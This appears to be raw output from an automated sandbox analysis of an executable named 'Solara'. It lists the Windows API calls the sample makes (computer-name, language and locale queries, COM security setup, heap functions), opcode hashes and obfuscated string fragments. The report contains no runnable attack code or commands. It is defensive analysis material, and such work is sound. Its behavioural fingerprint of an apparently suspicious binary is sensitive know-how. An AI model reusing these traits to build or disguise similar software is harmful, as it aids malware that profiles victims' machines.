                                                                                                                                      control_flow_graph 1326 42c342-42c39f FreeLibrary call 43e5d0 1331 42c3a0-42c420 1326->1331 1331->1331 1332 42c426-42c42b 1331->1332 1333 42c44d-42c450 1332->1333 1334 42c42d-42c433 1332->1334 1336 42c452-42c48c GetComputerNameExA 1333->1336 1335 42c440-42c449 1334->1335 1335->1335 1337 42c44b 1335->1337 1338 42c491 1336->1338 1337->1336 1338->1338
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0042C365
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042C467
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ComputerFreeLibraryName
                                                                                                                                      • String ID: 67"9
                                                                                                                                      • API String ID: 2904949787-764888412
                                                                                                                                      • Opcode ID: b31a60936a696bb8ac9ad3f8d1eeb2c46063e81764abb1d7a28fb08f4da03b98
                                                                                                                                      • Instruction ID: a936647d4a2902ee5bcfb1b7c92b01fc428b994644419bca8ab809060a124203
                                                                                                                                      • Opcode Fuzzy Hash: b31a60936a696bb8ac9ad3f8d1eeb2c46063e81764abb1d7a28fb08f4da03b98
                                                                                                                                      • Instruction Fuzzy Hash: D6313836711A008BE728CF39DC9176A7BE3AB9A314F6CC56DD4968B795CA349802CB40
                                                                                                                                      APIs
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042C467
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ComputerName
                                                                                                                                      • String ID: 67"9
                                                                                                                                      • API String ID: 3545744682-764888412
                                                                                                                                      • Opcode ID: 789287c801a252fdd4a67ecaaef88e82ec2753ba496f4b5378df858b0376ca89
                                                                                                                                      • Instruction ID: 293a5ed6f154df08a743ee3f4a16e53dad6762b24a5107bbaa3d7de7d287c13e
                                                                                                                                      • Opcode Fuzzy Hash: 789287c801a252fdd4a67ecaaef88e82ec2753ba496f4b5378df858b0376ca89
                                                                                                                                      • Instruction Fuzzy Hash: B6314936705A008BD328CF39DC90766BBE3ABDE314F2CC66DD4968B795C63498038A40
                                                                                                                                      APIs
                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C68A
                                                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C6A2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeSecurity
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 640775948-0
                                                                                                                                      • Opcode ID: 4e4955ddf3c0dacb34b5ac51785b67f41da4ac51f2eb30ab2d0209acdaafa15e
                                                                                                                                      • Instruction ID: 227358003f482ced3314481a5ade621542edaed12b629aad8eaacabb3c97592d
                                                                                                                                      • Opcode Fuzzy Hash: 4e4955ddf3c0dacb34b5ac51785b67f41da4ac51f2eb30ab2d0209acdaafa15e
                                                                                                                                      • Instruction Fuzzy Hash: 7EE067383C83017AF6B85754ED17F1536159BC6F22F744314F3227E6E985E03101450D
                                                                                                                                      APIs
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042C57C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ComputerName
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                      • Opcode ID: 37add48e1ef10fcb190b5233ab59b0fa1c0e4beaee5043c08eb7b8298cde4620
                                                                                                                                      • Instruction ID: 24ad2c4c1fcff2d921dcfefc0f3ddedc8dfffaf2f729866455c6990b84e8526e
                                                                                                                                      • Opcode Fuzzy Hash: 37add48e1ef10fcb190b5233ab59b0fa1c0e4beaee5043c08eb7b8298cde4620
                                                                                                                                      • Instruction Fuzzy Hash: C4313A712056528BD729CF29C850776F7E2EFD6305728C69EC0C69B386CB39A843CB60
                                                                                                                                      APIs
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042C57C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ComputerName
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                      • Opcode ID: 661c60d2f2737ba41bd0a79f45d99b313c697334d4a74aae7309d140d6149f28
                                                                                                                                      • Instruction ID: 8dce8de0a14591cc6a2b4b473347fac9497e417a88c568a702fc0cc16cba4c19
                                                                                                                                      • Opcode Fuzzy Hash: 661c60d2f2737ba41bd0a79f45d99b313c697334d4a74aae7309d140d6149f28
                                                                                                                                      • Instruction Fuzzy Hash: 632101752016418BD729CF29C8506B6B7E2AFDA306728CA9DC4869B795CB35B802CB50
                                                                                                                                      APIs
                                                                                                                                      • GetForegroundWindow.USER32 ref: 0043CD63
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ForegroundWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2020703349-0
                                                                                                                                      • Opcode ID: ed456f484e448e84512b378b5afe5f3e150082cf8148f39e6e46284216517408
                                                                                                                                      • Instruction ID: faab2df719c4861cf6076a9a06914b2a6fd7b03f7746ad1fffe8a6b2c1f1a3f7
                                                                                                                                      • Opcode Fuzzy Hash: ed456f484e448e84512b378b5afe5f3e150082cf8148f39e6e46284216517408
                                                                                                                                      • Instruction Fuzzy Hash: E6F0AFF9E015018FC708DB65D8A257A7F71AB4E201B14547DE293D7292CA3C9402CB58
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BlanketProxy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3890896728-0
                                                                                                                                      • Opcode ID: 1c6120414680557c1d63ac547c37c3c3d77819447900f90564d1abe17a814bb7
                                                                                                                                      • Instruction ID: ab97724c96284eb61b34534b8364b478ea508967f008a032bc8576df3c15567f
                                                                                                                                      • Opcode Fuzzy Hash: 1c6120414680557c1d63ac547c37c3c3d77819447900f90564d1abe17a814bb7
                                                                                                                                      • Instruction Fuzzy Hash: 6C115EB551D3818FD715DF34C4A875ABBF0AF8A304F05485EE4818B295D7759908CB82
                                                                                                                                      APIs
                                                                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B2E3,00000000,00000001), ref: 0043CB02
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: edb15e3ab90b45a8af29d8649835adf509376766f5d68a38b365d68a68e386aa
                                                                                                                                      • Instruction ID: 5d969644212806e3c3bf252d86614acb20f9660ae6417efe77807246ee15235b
                                                                                                                                      • Opcode Fuzzy Hash: edb15e3ab90b45a8af29d8649835adf509376766f5d68a38b365d68a68e386aa
                                                                                                                                      • Instruction Fuzzy Hash: 12F0E975504512DBC2011B257D02B4F3678DF8A355F06087AF41452116FB39E8018A9B
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BlanketProxy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3890896728-0
                                                                                                                                      • Opcode ID: ee497ceb5c9214244585d267ef41672792a8650c1da29f404235f6a4702f35bd
                                                                                                                                      • Instruction ID: 1c87a0e3233254b08153678257ea4086bba042a859ab6da54d410de2b010cd23
                                                                                                                                      • Opcode Fuzzy Hash: ee497ceb5c9214244585d267ef41672792a8650c1da29f404235f6a4702f35bd
                                                                                                                                      • Instruction Fuzzy Hash: DAF0B7B45093418FE364DF28C5A875BBBF0BBC8304F10891DE4899B390C7B99948CF82
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BlanketProxy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3890896728-0
                                                                                                                                      • Opcode ID: a5899d0953e9109f7ab2e0181c4d4337840cf80e189a7982ab343853d1550f04
                                                                                                                                      • Instruction ID: f02050c71775901e0accb95120e8abc668ee7b6be75ed2390cb8bce01b974d13
                                                                                                                                      • Opcode Fuzzy Hash: a5899d0953e9109f7ab2e0181c4d4337840cf80e189a7982ab343853d1550f04
                                                                                                                                      • Instruction Fuzzy Hash: 45F0A4B41097018FE305DF29D5A4B1ABBE0AB89304F10885CE4958B3A0C7B5AA48CF82
                                                                                                                                      APIs
                                                                                                                                      • GetUserDefaultUILanguage.KERNELBASE ref: 004371F4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DefaultLanguageUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 95929093-0
                                                                                                                                      • Opcode ID: 1c9ba12358e028ce5ad86a6bee88428fd603e8931f10badd6d23c32c8f5edf55
                                                                                                                                      • Instruction ID: 5ebb24f99b21f731d26b18476b759c2abbc47ae1acd10b7bb8e930ff00d54a4c
                                                                                                                                      • Opcode Fuzzy Hash: 1c9ba12358e028ce5ad86a6bee88428fd603e8931f10badd6d23c32c8f5edf55
                                                                                                                                      • Instruction Fuzzy Hash: 73E09274E042118FE704EF79C88149E7BB2AF8A304F91816EE40867315EB316E45CFA2
                                                                                                                                      APIs
                                                                                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C643
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Initialize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2538663250-0
                                                                                                                                      • Opcode ID: cd42a5a4dce87d812f1abf349de20b4594aba43bb79ab66a75b2839703dfa80a
                                                                                                                                      • Instruction ID: a4dfa9031c14046a45178540886116698027186f480290ae2639a9c596a04d4c
                                                                                                                                      • Opcode Fuzzy Hash: cd42a5a4dce87d812f1abf349de20b4594aba43bb79ab66a75b2839703dfa80a
                                                                                                                                      • Instruction Fuzzy Hash: B5D0A7745D41047FD350679DEC47F22771CD787715F800235F663E66D1E9506810C66E
                                                                                                                                      APIs
                                                                                                                                      • GetForegroundWindow.USER32 ref: 0043CD63
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ForegroundWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2020703349-0
                                                                                                                                      • Opcode ID: 6dcb1776cee1d153586e14da11da168a4e03c9aef46a2935d1855ad25c1fac8d
                                                                                                                                      • Instruction ID: f54c799b3e1d185d6ff0fc883792242feb74c9ed312bb5c290f57c98abefd447
                                                                                                                                      • Opcode Fuzzy Hash: 6dcb1776cee1d153586e14da11da168a4e03c9aef46a2935d1855ad25c1fac8d
                                                                                                                                      • Instruction Fuzzy Hash: 68E0BDF9A40201AFC744CF95ECA1A2A7361AB4E20AB545469E613D3762DA74A902DA28
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?,0043CB2F,?,0040B2E3,00000000,00000001), ref: 0043B020
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                      • Opcode ID: 6af43694677fd09eafb5c951c265955496afa9d4d45c7c5b027f9f99247e252b
                                                                                                                                      • Instruction ID: 61b4f02c34fd151ce91914b35a7c0f80d16b96fee70fed83274fa13f5b0cfbb9
                                                                                                                                      • Opcode Fuzzy Hash: 6af43694677fd09eafb5c951c265955496afa9d4d45c7c5b027f9f99247e252b
                                                                                                                                      • Instruction Fuzzy Hash: 21D0C931405122EBC6102F19BC15BDB3A989F49731F0B0CA5F400AA0B5C665EC918AD8
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043AFE4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 7b9abb57133b60726d1385412c59d9b74094eb8ad81a9789267d73a866c3d0f4
                                                                                                                                      • Instruction ID: 80fc8093897b85bacbaa228d6fa313331b2beaa15c845420d8ec3cb35496cb8b
                                                                                                                                      • Opcode Fuzzy Hash: 7b9abb57133b60726d1385412c59d9b74094eb8ad81a9789267d73a866c3d0f4
                                                                                                                                      • Instruction Fuzzy Hash: E2C04830141310EAD2351B11AC4DFBF3E38AB4BF93F1018A8F51AB40A18B649001AA6E
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043AFE4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 01b9d4e518351c976bf81a7a65044f0a8b5324ec5c468e100fac1da4fab70dee
                                                                                                                                      • Instruction ID: 037b63a8b8360bb05149ba41dbe56120957af011dba793463e955943995801e5
                                                                                                                                      • Opcode Fuzzy Hash: 01b9d4e518351c976bf81a7a65044f0a8b5324ec5c468e100fac1da4fab70dee
                                                                                                                                      • Instruction Fuzzy Hash: C7A00134145250EAD2651B11AC49B6F3A38AB46F92F1408A8F516A40A18B755441AA6E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: !E5G$"e g$)]*_$+U-W$,Q-S$3M(O$3$3$9A>C$;?$Bq$FG$H=B?$H7$Jw$K)O+$O1M3$O5Z7$Ua!c$WL$ZkHu$^gXa$^oYi$_mYo$cSm]$de$g9O;$gWcQ$s!`#$v|$zKhU$20
                                                                                                                                      • API String ID: 0-3503618729
                                                                                                                                      • Opcode ID: ea0e6c53dd85806e701f9ad55394b8e5cd988ebf4a7960e609d8b58b9626ee65
                                                                                                                                      • Instruction ID: 6283b065b235d505556243adb6f38be15c390c0914468d957aff8aee918c3b7a
                                                                                                                                      • Opcode Fuzzy Hash: ea0e6c53dd85806e701f9ad55394b8e5cd988ebf4a7960e609d8b58b9626ee65
                                                                                                                                      • Instruction Fuzzy Hash: C7A251B560C3918BD334CF55D841B9BBAF2FBD6304F04882DD5D99B252DAB48A058B87
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: !E5G$"e g$)]*_$+U-W$,Q-S$3M(O$3$3$9A>C$Bq$FG$H=B?$H7$Jw$K)O+$O1M3$O5Z7$Ua!c$WL$ZkHu$^gXa$^oYi$_mYo$cSm]$de$g9O;$gWcQ$s!`#$v|$zKhU$20
                                                                                                                                      • API String ID: 0-2304432800
                                                                                                                                      • Opcode ID: a7b134c2f0dc2ea3d4469a847659a866cb5ab6c3b7ed4e4ded45045b4059780f
                                                                                                                                      • Instruction ID: 476e3c5d567003482c8876f7be28c7c32d5a701307a7bc316dfa7ddc7bd017b9
                                                                                                                                      • Opcode Fuzzy Hash: a7b134c2f0dc2ea3d4469a847659a866cb5ab6c3b7ed4e4ded45045b4059780f
                                                                                                                                      • Instruction Fuzzy Hash: 34A251B56083918BD334CF15D841B9BBBF2FBC6304F04882DE5D99B252DBB59A058B87
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: !E5G$"e g$)]*_$+U-W$,Q-S$3M(O$3$3$9A>C$Bq$FG$H=B?$H7$Jw$K)O+$O1M3$O5Z7$Ua!c$WL$ZkHu$^gXa$^oYi$_mYo$cSm]$de$g9O;$gWcQ$s!`#$v|$zKhU$20
                                                                                                                                      • API String ID: 0-2304432800
                                                                                                                                      • Opcode ID: 66150d6f9f32aa66e828b2db73cfe6ede659f70b1d005a5df999f2aeb34ec776
                                                                                                                                      • Instruction ID: 07d480bc0cb5211ed9978c09f229c415a34b5a85334edb6a9a948f0f83307101
                                                                                                                                      • Opcode Fuzzy Hash: 66150d6f9f32aa66e828b2db73cfe6ede659f70b1d005a5df999f2aeb34ec776
                                                                                                                                      • Instruction Fuzzy Hash: 43A250B560C3918BD334CF55E841B9BBBF2FBD6304F04882DD4D99B252DAB49A058B87
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: CM$!k<u$*w%q$N3G=$T#\-$U/H)$W'P!$G A$OI$_Y
                                                                                                                                      • API String ID: 0-3497491785
                                                                                                                                      • Opcode ID: 6ba449a952caf33b0480fd7f6bd8f0cdf4cf6a13b5107a5dc61e8b4566240a3c
                                                                                                                                      • Instruction ID: 6baa709048fc37f4dc64dcadfdb20c2af5d4728195a035124e03ea550994a826
                                                                                                                                      • Opcode Fuzzy Hash: 6ba449a952caf33b0480fd7f6bd8f0cdf4cf6a13b5107a5dc61e8b4566240a3c
                                                                                                                                      • Instruction Fuzzy Hash: 511237B5200B01CFD3248F25D895757BBF2FB86314F158A2CE5AA8BB90DB79A405CF94
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *DJ$5z$6X^$D$FR@a$riA$~$~q$HN
                                                                                                                                      • API String ID: 0-355965560
                                                                                                                                      • Opcode ID: 92e506d3fa21ebba47adcaa3c809938fcfe6e50985f5d592aea4614274bdc6bf
                                                                                                                                      • Instruction ID: 6afc8d414a6b5a7e11aefce25dc235c7a956958d450dc9bc8f61e015338e6f48
                                                                                                                                      • Opcode Fuzzy Hash: 92e506d3fa21ebba47adcaa3c809938fcfe6e50985f5d592aea4614274bdc6bf
                                                                                                                                      • Instruction Fuzzy Hash: 203204742083419FE7248F24C891BABB7E1FF86314F15896DE4C65B3A2D338D945CB9A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LwLz$N()/$RRBy$U($YZ]g$`IKW$`nXZ$ad|;$hegq
                                                                                                                                      • API String ID: 0-168236137
                                                                                                                                      • Opcode ID: 1345aa52a7f8b16bd96f3e6fda049f910b270f8dfa6eb1c258dfd90525c372db
                                                                                                                                      • Instruction ID: 0e4cbd198706b047ea49ea4d5f4520122aa2f683c7acf1c11bf3608a309aef14
                                                                                                                                      • Opcode Fuzzy Hash: 1345aa52a7f8b16bd96f3e6fda049f910b270f8dfa6eb1c258dfd90525c372db
                                                                                                                                      • Instruction Fuzzy Hash: 4052367590C3508FC721DF25C8807ABBBE2AF95314F188A6DE4E48B392D739D846CB56
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C16A: GetLastError.KERNEL32(00000000,?,0021E58D), ref: 0021C16E
                                                                                                                                        • Part of subcall function 0021C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00218363), ref: 0021C210
                                                                                                                                      • GetUserDefaultLCID.KERNEL32 ref: 0022138F
                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 002213CD
                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 002213E0
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00221428
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00221443
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                      • String ID: ,K#
                                                                                                                                      • API String ID: 415426439-2147254570
                                                                                                                                      • Opcode ID: 77c4969462cfeeee32d25a8ed9a8a30fc6a4d9df8aa9bb7b78ea8537e0461e9d
                                                                                                                                      • Instruction ID: c7cec249ae6ad7e6a2d3a557c8e00f1617d83168ccf281d5728ee3c35070f39d
                                                                                                                                      • Opcode Fuzzy Hash: 77c4969462cfeeee32d25a8ed9a8a30fc6a4d9df8aa9bb7b78ea8537e0461e9d
